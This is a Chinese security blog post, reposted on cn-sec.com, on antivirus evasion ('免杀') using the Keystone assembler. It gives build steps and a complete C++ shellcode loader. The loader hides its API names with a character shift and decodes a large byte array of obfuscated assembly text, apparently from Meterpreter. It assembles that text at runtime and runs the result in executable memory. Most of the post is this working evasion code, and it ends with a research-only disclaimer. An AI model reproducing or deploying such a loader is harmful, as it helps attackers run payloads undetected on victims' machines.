keystone 动态生成代码免杀

admin
admin
admin
138635
文章
114
评论
2020年9月30日12:36:03评论260 views字数 13245阅读44分9秒阅读模式

点击蓝字 ·  关注我们

01

标题

keystone 动态生成代码免杀

02

编译 keystone


https://github.com/keystone-engine/keystone/archive/0.9.2.zip
  • 需要 vs2017 或者其他版本的 IDE
  • cmake

打开 vs2017 命令提示符开始编译
mkdir buildcd build..nmake-dll.bat
编译好得到 dll

03

编译

胡乱写的 shellcode loader
工程属性中配置好包含目录之类的
然后把 meterpreter 的源码提取出来,之前提到的
以下“乱写”的源码
/* test1.c */#include <stdio.h>#include<Windows.h>#include <keystone/keystone.h>static int test_ks(ks_arch arch, int mode, const char *assembly, int syntax){  ks_engine *ks;  ks_err err;  size_t count;  unsigned char *encode;  size_t size;  return 0;}void fuckyou(int aaaa) {  __asm {    mov eax, aaaa    push eax    ret  }}struct S {  char * a;  S(){}  S(char* s){    a = (char*)malloc(strlen(s)+20);    memset(a, 0,strlen(s) + 20);    strncpy(a, s, strlen(s));  }  char* operator+(int c) {    char* b;    b = (char*)malloc(strlen(this->a) + 20);    memset(b, 0,strlen(this->a) + 20);    for (size_t i = 0; i < strlen(this->a); i++) {      b[i]=(this->a)[i]+c;    }    return b;  }};template<class T>void Sort(T* arr, int nLength) {  int i;  int k;  for (i = 0; i < nLength - 1; i++) {    for (k = 0; k < nLength - 1; k++) {      if (arr[k] > arr[k + 1]) {        T temp = arr[k];        arr[k] = arr[k + 1];        arr[k + 1] = temp;      }    }  }}int main(int argc, char **argv){  S open((char*)"jr^nodm");  S close((char*)"jr^bknrd");  S free((char*)"jr^eqdd");  S assm((char*)"jr^`rl");  S errnno((char*)"jr^dqqmn");  S kernel32((char*)"Jdqmdk21-ckk");  S virtualalloc((char*)"Uhqst`k@kknb");  test_ks(KS_ARCH_X86, KS_MODE_32, "add eax, ecx"0);  HMODULE hDll = LoadLibrary("keystone.dll");  decltype(ks_open)* myks_open = (decltype(ks_open)*)GetProcAddress(hDll, open+1);  decltype(ks_close)* myks_close = (decltype(ks_close)*)GetProcAddress(hDll, close+1);  decltype(ks_free)* myks_free = (decltype(ks_free)*)GetProcAddress(hDll, free + 1);  decltype(ks_asm)* myks_asm = (decltype(ks_asm)*)GetProcAddress(hDll, assm + 1);  decltype(ks_errno)* myks_errno = (decltype(ks_errno)*)GetProcAddress(hDll, errnno + 1);  decltype(VirtualAlloc)* myVirtualAlloc = (decltype(VirtualAlloc)*)GetProcAddress(GetModuleHandle(kernel32 + 1), virtualalloc + 1);  ks_engine *ks;  ks_err err;  size_t count;  unsigned char *encode;  size_t size;  unsigned char fuck[2095] = {  0x62, 0x6B, 0x63, 0x3A, 0x62, 0x60, 0x6B, 0x6B,  0x1F, 0x72, 0x73, 0x60, 0x71, 0x73, 0x3A, 0x60,  0x6F, 0x68, 0x5E, 0x62, 0x60, 0x6B, 0x6B, 0x39,  0x1F, 0x6F, 0x74, 0x72, 0x67, 0x60, 0x63, 0x1F,  0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x61, 0x6F,  0x2B, 0x1F, 0x64, 0x72, 0x6F, 0x3A, 0x77, 0x6E,  0x71, 0x1F, 0x64, 0x60, 0x77, 0x2B, 0x1F, 0x64,  0x60, 0x77, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,  0x63, 0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71,  0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x65, 0x72,  0x39, 0x5A, 0x64, 0x60, 0x77, 0x1F, 0x2A, 0x1F,  0x2F, 0x77, 0x32, 0x2F, 0x5C, 0x3A, 0x6C, 0x6E,  0x75, 0x1F, 0x64, 0x63, 0x77, 0x2B, 0x1F, 0x63,  0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71,  0x1F, 0x5A, 0x64, 0x63, 0x77, 0x1F, 0x2A, 0x1F,  0x2F, 0x77, 0x62, 0x5C, 0x3A, 0x6C, 0x6E, 0x75,  0x1F, 0x64, 0x63, 0x77, 0x2B, 0x1F, 0x63, 0x76,  0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F,  0x5A, 0x64, 0x63, 0x77, 0x1F, 0x2A, 0x1F, 0x2F,  0x77, 0x30, 0x33, 0x5C, 0x3A, 0x6D, 0x64, 0x77,  0x73, 0x5E, 0x6C, 0x6E, 0x63, 0x39, 0x1F, 0x6C,  0x6E, 0x75, 0x1F, 0x64, 0x72, 0x68, 0x2B, 0x1F,  0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73,  0x71, 0x1F, 0x5A, 0x64, 0x63, 0x77, 0x1F, 0x2A,  0x1F, 0x2F, 0x77, 0x31, 0x37, 0x5C, 0x3A, 0x6C,  0x6E, 0x75, 0x79, 0x77, 0x1F, 0x64, 0x62, 0x77,  0x2B, 0x1F, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F,  0x73, 0x71, 0x1F, 0x5A, 0x64, 0x63, 0x77, 0x1F,  0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x35, 0x5C, 0x3A,  0x77, 0x6E, 0x71, 0x1F, 0x64, 0x63, 0x68, 0x2B,  0x1F, 0x64, 0x63, 0x68, 0x3A, 0x6B, 0x6E, 0x6E,  0x6F, 0x5E, 0x6C, 0x6E, 0x63, 0x6D, 0x60, 0x6C,  0x64, 0x39, 0x1F, 0x6B, 0x6E, 0x63, 0x72, 0x61,  0x1F, 0x1F, 0x3A, 0x62, 0x6C, 0x6F, 0x1F, 0x60,  0x6B, 0x2B, 0x1F, 0x2F, 0x77, 0x35, 0x30, 0x3A,  0x69, 0x6B, 0x1F, 0x6D, 0x6E, 0x73, 0x5E, 0x6B,  0x6E, 0x76, 0x64, 0x71, 0x62, 0x60, 0x72, 0x64,  0x3A, 0x72, 0x74, 0x61, 0x1F, 0x60, 0x6B, 0x2B,  0x1F, 0x2F, 0x77, 0x31, 0x2F, 0x3A, 0x6D, 0x6E,  0x73, 0x5E, 0x6B, 0x6E, 0x76, 0x64, 0x71, 0x62,  0x60, 0x72, 0x64, 0x39, 0x1F, 0x71, 0x6E, 0x71,  0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F, 0x30, 0x32,  0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x63, 0x68,  0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6B, 0x6E,  0x6E, 0x6F, 0x1F, 0x6B, 0x6E, 0x6E, 0x6F, 0x5E,  0x6C, 0x6E, 0x63, 0x6D, 0x60, 0x6C, 0x64, 0x3A,  0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x63, 0x77,  0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x63,  0x68, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x63,  0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,  0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x63,  0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x30, 0x2F,  0x5C, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x62,  0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,  0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x63,  0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x32, 0x62,  0x5C, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x62,  0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,  0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x62,  0x77, 0x1F, 0x2A, 0x1F, 0x64, 0x63, 0x77, 0x1F,  0x2A, 0x1F, 0x2F, 0x77, 0x36, 0x37, 0x5C, 0x3A,  0x69, 0x64, 0x62, 0x77, 0x79, 0x1F, 0x66, 0x64,  0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C,  0x6E, 0x63, 0x30, 0x3A, 0x60, 0x63, 0x63, 0x1F,  0x64, 0x62, 0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77,  0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x62,  0x77, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x61,  0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,  0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x62,  0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x2F,  0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x61,  0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6C,  0x6E, 0x75, 0x1F, 0x64, 0x62, 0x77, 0x2B, 0x1F,  0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73,  0x71, 0x1F, 0x5A, 0x64, 0x62, 0x77, 0x1F, 0x2A,  0x1F, 0x2F, 0x77, 0x30, 0x37, 0x5C, 0x3A, 0x66,  0x64, 0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73, 0x5E,  0x65, 0x74, 0x6D, 0x62, 0x39, 0x1F, 0x69, 0x64,  0x62, 0x77, 0x79, 0x1F, 0x66, 0x64, 0x73, 0x5E,  0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C, 0x6E, 0x63,  0x3A, 0x63, 0x64, 0x62, 0x1F, 0x64, 0x62, 0x77,  0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x72, 0x68,  0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F,  0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x61, 0x77,  0x1F, 0x2A, 0x1F, 0x64, 0x62, 0x77, 0x29, 0x33,  0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x72,  0x68, 0x2B, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x77,  0x6E, 0x71, 0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F,  0x64, 0x63, 0x68, 0x3A, 0x6B, 0x6E, 0x6E, 0x6F,  0x5E, 0x65, 0x74, 0x6D, 0x62, 0x6D, 0x60, 0x6C,  0x64, 0x39, 0x1F, 0x6B, 0x6E, 0x63, 0x72, 0x61,  0x1F, 0x1F, 0x3A, 0x71, 0x6E, 0x71, 0x1F, 0x64,  0x63, 0x68, 0x2B, 0x1F, 0x30, 0x32, 0x3A, 0x60,  0x63, 0x63, 0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F,  0x64, 0x60, 0x77, 0x3A, 0x62, 0x6C, 0x6F, 0x1F,  0x60, 0x6B, 0x2B, 0x1F, 0x60, 0x67, 0x3A, 0x69,  0x6D, 0x64, 0x1F, 0x6B, 0x6E, 0x6E, 0x6F, 0x5E,  0x65, 0x74, 0x6D, 0x62, 0x6D, 0x60, 0x6C, 0x64,  0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x63, 0x68,  0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F,  0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x61, 0x6F,  0x1F, 0x2C, 0x1F, 0x37, 0x5C, 0x3A, 0x62, 0x6C,  0x6F, 0x1F, 0x64, 0x63, 0x68, 0x2B, 0x1F, 0x63,  0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71,  0x1F, 0x5A, 0x64, 0x61, 0x6F, 0x1F, 0x2A, 0x1F,  0x2F, 0x77, 0x31, 0x33, 0x5C, 0x3A, 0x69, 0x6D,  0x79, 0x1F, 0x66, 0x64, 0x73, 0x5E, 0x6D, 0x64,  0x77, 0x73, 0x5E, 0x65, 0x74, 0x6D, 0x62, 0x3A,  0x6F, 0x6E, 0x6F, 0x1F, 0x64, 0x60, 0x77, 0x3A,  0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x61, 0x77, 0x2B,  0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F, 0x6F,  0x73, 0x71, 0x1F, 0x5A, 0x64, 0x60, 0x77, 0x1F,  0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x33, 0x5C, 0x3A,  0x60, 0x63, 0x63, 0x1F, 0x64, 0x61, 0x77, 0x2B,  0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6C, 0x6E, 0x75,  0x1F, 0x62, 0x77, 0x2B, 0x1F, 0x76, 0x6E, 0x71,  0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64,  0x61, 0x77, 0x1F, 0x2A, 0x1F, 0x64, 0x62, 0x77,  0x29, 0x31, 0x5C, 0x3A, 0x6C, 0x6E, 0x75, 0x1F,  0x64, 0x61, 0x77, 0x2B, 0x1F, 0x63, 0x76, 0x6E,  0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A,  0x64, 0x60, 0x77, 0x1F, 0x2A, 0x1F, 0x2F, 0x77,  0x30, 0x62, 0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F,  0x64, 0x61, 0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77,  0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x60, 0x77,  0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63, 0x1F,  0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x61, 0x77,  0x1F, 0x2A, 0x1F, 0x64, 0x62, 0x77, 0x29, 0x33,  0x5C, 0x3A, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x60,  0x77, 0x2B, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x65,  0x68, 0x6D, 0x68, 0x72, 0x67, 0x39, 0x1F, 0x6C,  0x6E, 0x75, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,  0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x72,  0x6F, 0x1F, 0x2A, 0x1F, 0x2F, 0x77, 0x31, 0x33,  0x5C, 0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F,  0x6E, 0x6F, 0x1F, 0x64, 0x61, 0x77, 0x3A, 0x6F,  0x6E, 0x6F, 0x1F, 0x64, 0x61, 0x77, 0x3A, 0x6F,  0x6E, 0x6F, 0x60, 0x63, 0x1F, 0x1F, 0x3A, 0x6F,  0x6E, 0x6F, 0x1F, 0x64, 0x62, 0x77, 0x3A, 0x6F,  0x6E, 0x6F, 0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6F,  0x74, 0x72, 0x67, 0x1F, 0x64, 0x62, 0x77, 0x3A,  0x69, 0x6C, 0x6F, 0x1F, 0x64, 0x60, 0x77, 0x3A,  0x66, 0x64, 0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73,  0x5E, 0x6C, 0x6E, 0x63, 0x39, 0x1F, 0x6F, 0x6E,  0x6F, 0x1F, 0x64, 0x63, 0x68, 0x3A, 0x66, 0x64,  0x73, 0x5E, 0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C,  0x6E, 0x63, 0x30, 0x39, 0x1F, 0x6F, 0x6E, 0x6F,  0x1F, 0x64, 0x63, 0x68, 0x3A, 0x6F, 0x6E, 0x6F,  0x1F, 0x64, 0x63, 0x77, 0x3A, 0x6C, 0x6E, 0x75,  0x1F, 0x64, 0x63, 0x77, 0x2B, 0x1F, 0x63, 0x76,  0x6E, 0x71, 0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F,  0x5A, 0x64, 0x63, 0x77, 0x5C, 0x3A, 0x69, 0x6C,  0x6F, 0x1F, 0x6D, 0x64, 0x77, 0x73, 0x5E, 0x6C,  0x6E, 0x63, 0x3A, 0x72, 0x73, 0x60, 0x71, 0x73,  0x39, 0x1F, 0x6F, 0x6E, 0x6F, 0x1F, 0x64, 0x61,  0x6F, 0x3A, 0x71, 0x64, 0x75, 0x64, 0x71, 0x72,  0x64, 0x5E, 0x73, 0x62, 0x6F, 0x39, 0x1F, 0x6F,  0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x32, 0x31,  0x32, 0x32, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,  0x2F, 0x77, 0x34, 0x65, 0x32, 0x31, 0x36, 0x32,  0x36, 0x36, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,  0x64, 0x72, 0x6F, 0x3A, 0x6F, 0x74, 0x72, 0x67,  0x1F, 0x2F, 0x77, 0x36, 0x31, 0x35, 0x36, 0x36,  0x33, 0x62, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,  0x60, 0x77, 0x2B, 0x1F, 0x64, 0x61, 0x6F, 0x3A,  0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64, 0x60, 0x77,  0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64, 0x60, 0x77,  0x2B, 0x1F, 0x2F, 0x77, 0x2F, 0x30, 0x38, 0x2F,  0x3A, 0x72, 0x74, 0x61, 0x1F, 0x64, 0x72, 0x6F,  0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74,  0x72, 0x67, 0x1F, 0x64, 0x72, 0x6F, 0x3A, 0x6F,  0x74, 0x72, 0x67, 0x1F, 0x64, 0x60, 0x77, 0x3A,  0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x35,  0x61, 0x37, 0x2F, 0x31, 0x38, 0x3A, 0x62, 0x60,  0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F, 0x3A, 0x72,  0x64, 0x73, 0x5E, 0x60, 0x63, 0x63, 0x71, 0x64,  0x72, 0x72, 0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67,  0x1F, 0x2F, 0x77, 0x60, 0x3A, 0x62, 0x71, 0x64,  0x60, 0x73, 0x64, 0x5E, 0x72, 0x6E, 0x62, 0x6A,  0x64, 0x73, 0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67,  0x1F, 0x2F, 0x77, 0x30, 0x2F, 0x2F, 0x2F, 0x2F,  0x36, 0x65, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,  0x2F, 0x77, 0x34, 0x62, 0x30, 0x30, 0x2F, 0x2F,  0x2F, 0x31, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,  0x72, 0x68, 0x2B, 0x1F, 0x64, 0x72, 0x6F, 0x3A,  0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x60, 0x77,  0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x60,  0x77, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64,  0x60, 0x77, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,  0x64, 0x60, 0x77, 0x3A, 0x68, 0x6D, 0x62, 0x1F,  0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74, 0x72, 0x67,  0x1F, 0x64, 0x60, 0x77, 0x3A, 0x68, 0x6D, 0x62,  0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74, 0x72,  0x67, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x6F, 0x74,  0x72, 0x67, 0x1F, 0x2F, 0x77, 0x64, 0x2F, 0x63,  0x65, 0x2F, 0x65, 0x64, 0x60, 0x3A, 0x62, 0x60,  0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F, 0x3A, 0x77,  0x62, 0x67, 0x66, 0x1F, 0x64, 0x63, 0x68, 0x2B,  0x1F, 0x64, 0x60, 0x77, 0x3A, 0x73, 0x71, 0x78,  0x5E, 0x62, 0x6E, 0x6D, 0x6D, 0x64, 0x62, 0x73,  0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x30,  0x35, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64,  0x72, 0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,  0x64, 0x63, 0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67,  0x1F, 0x2F, 0x77, 0x35, 0x30, 0x36, 0x33, 0x60,  0x34, 0x38, 0x38, 0x3A, 0x62, 0x60, 0x6B, 0x6B,  0x1F, 0x64, 0x61, 0x6F, 0x3A, 0x73, 0x64, 0x72,  0x73, 0x1F, 0x64, 0x60, 0x77, 0x2B, 0x64, 0x60,  0x77, 0x3A, 0x69, 0x79, 0x1F, 0x62, 0x6E, 0x6D,  0x6D, 0x64, 0x62, 0x73, 0x64, 0x63, 0x3A, 0x67,  0x60, 0x6D, 0x63, 0x6B, 0x64, 0x5E, 0x62, 0x6E,  0x6D, 0x6D, 0x64, 0x62, 0x73, 0x5E, 0x65, 0x60,  0x68, 0x6B, 0x74, 0x71, 0x64, 0x39, 0x1F, 0x63,  0x64, 0x62, 0x1F, 0x63, 0x76, 0x6E, 0x71, 0x63,  0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64, 0x72,  0x68, 0x1F, 0x2A, 0x1F, 0x37, 0x5C, 0x3A, 0x69,  0x6D, 0x79, 0x1F, 0x73, 0x71, 0x78, 0x5E, 0x62,  0x6E, 0x6D, 0x6D, 0x64, 0x62, 0x73, 0x3A, 0x65,  0x60, 0x68, 0x6B, 0x74, 0x71, 0x64, 0x39, 0x1F,  0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x34,  0x35, 0x40, 0x31, 0x41, 0x34, 0x45, 0x2F, 0x3A,  0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F,  0x3A, 0x62, 0x6E, 0x6D, 0x6D, 0x64, 0x62, 0x73,  0x64, 0x63, 0x39, 0x1F, 0x71, 0x64, 0x62, 0x75,  0x39, 0x1F, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F,  0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x33, 0x3A,  0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x72, 0x68,  0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x63,  0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F,  0x77, 0x34, 0x65, 0x62, 0x37, 0x63, 0x38, 0x2F,  0x31, 0x3A, 0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64,  0x61, 0x6F, 0x3A, 0x6C, 0x6E, 0x75, 0x1F, 0x64,  0x72, 0x68, 0x2B, 0x1F, 0x63, 0x76, 0x6E, 0x71,  0x63, 0x1F, 0x6F, 0x73, 0x71, 0x1F, 0x5A, 0x64,  0x72, 0x68, 0x5C, 0x3A, 0x6F, 0x74, 0x72, 0x67,  0x1F, 0x2F, 0x77, 0x33, 0x2F, 0x3A, 0x6F, 0x74,  0x72, 0x67, 0x1F, 0x2F, 0x77, 0x30, 0x2F, 0x2F,  0x2F, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64,  0x72, 0x68, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F,  0x2F, 0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x2F,  0x77, 0x64, 0x34, 0x34, 0x32, 0x60, 0x33, 0x34,  0x37, 0x3A, 0x62, 0x60, 0x6B, 0x6B, 0x1F, 0x64,  0x61, 0x6F, 0x3A, 0x77, 0x62, 0x67, 0x66, 0x1F,  0x64, 0x61, 0x77, 0x2B, 0x1F, 0x64, 0x60, 0x77,  0x3A, 0x6F, 0x74, 0x72, 0x67, 0x1F, 0x64, 0x61,  0x77, 0x3A, 0x71, 0x64, 0x60, 0x63, 0x5E, 0x6C,  0x6E, 0x71, 0x64, 0x39, 0x1F, 0x6F, 0x74, 0x72,  0x67, 0x1F, 0x2F, 0x3A, 0x6F, 0x74, 0x72, 0x67,  0x1F, 0x64, 0x72, 0x68, 0x3A, 0x6F, 0x74, 0x72,  0x67, 0x1F, 0x64, 0x61, 0x77, 0x3A, 0x6F, 0x74,  0x72, 0x67, 0x1F, 0x64, 0x63, 0x68, 0x3A, 0x6F,  0x74, 0x72, 0x67, 0x1F, 0x2F, 0x77, 0x34, 0x65,  0x62, 0x37, 0x63, 0x38, 0x2F, 0x31, 0x3A, 0x62,  0x60, 0x6B, 0x6B, 0x1F, 0x64, 0x61, 0x6F, 0x3A,  0x71, 0x64, 0x60, 0x63, 0x5E, 0x72, 0x74, 0x62,  0x62, 0x64, 0x72, 0x72, 0x65, 0x74, 0x6B, 0x39,  0x1F, 0x60, 0x63, 0x63, 0x1F, 0x64, 0x61, 0x77,  0x2B, 0x1F, 0x64, 0x60, 0x77, 0x3A, 0x72, 0x74,  0x61, 0x1F, 0x64, 0x72, 0x68, 0x2B, 0x1F, 0x64,  0x60, 0x77, 0x3A, 0x69, 0x6D, 0x79, 0x1F, 0x71,  0x64, 0x60, 0x63, 0x5E, 0x6C, 0x6E, 0x71, 0x64,  0x3A, 0x71, 0x64, 0x73, 0x1F, 0x1F, 0x3A  };  S* fck= new S((char*)fuck);  char* CODE = *fck + 1;  err = myks_open(KS_ARCH_X86, KS_MODE_32, &ks);  if (err != KS_ERR_OK) {    printf("ERROR: failed on ks_open(), quitn");    return -1;  }  test_ks(KS_ARCH_X86, KS_MODE_32, "add eax, ecx"0);  if (myks_asm(ks, CODE, 0, &encode, &size, &count) != KS_ERR_OK) {    printf("ERROR: ks_asm() failed & count = %lu, error = %un",      count, myks_errno(ks));  }  else {    size_t i;    printf("%s = ", CODE);    for (i = 0; i < size; i++) {      printf("%02x ", encode[i]);    }    printf("n");    printf("Compiled: %lu bytes, statements: %lun", size, count);  }  PBYTE a = (PBYTE)myVirtualAlloc(NULL, size + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  for (size_t i = 0; i < size; i++) {    a[i] = encode[i];  }  __asm{    push a    call fuckyou  }  //CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)a, NULL, NULL, NULL);  // NOTE: free encode after usage to avoid leaking memory  myks_free(encode);    // close Keystone instance when done  myks_close(ks);  getchar();  return 0;}

04

结果

效果于 2020/07/08


keystone 动态生成代码免杀


EDI安全

keystone 动态生成代码免杀

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月30日12:36:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   keystone 动态生成代码免杀http://cn-sec.com/archives/147027.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息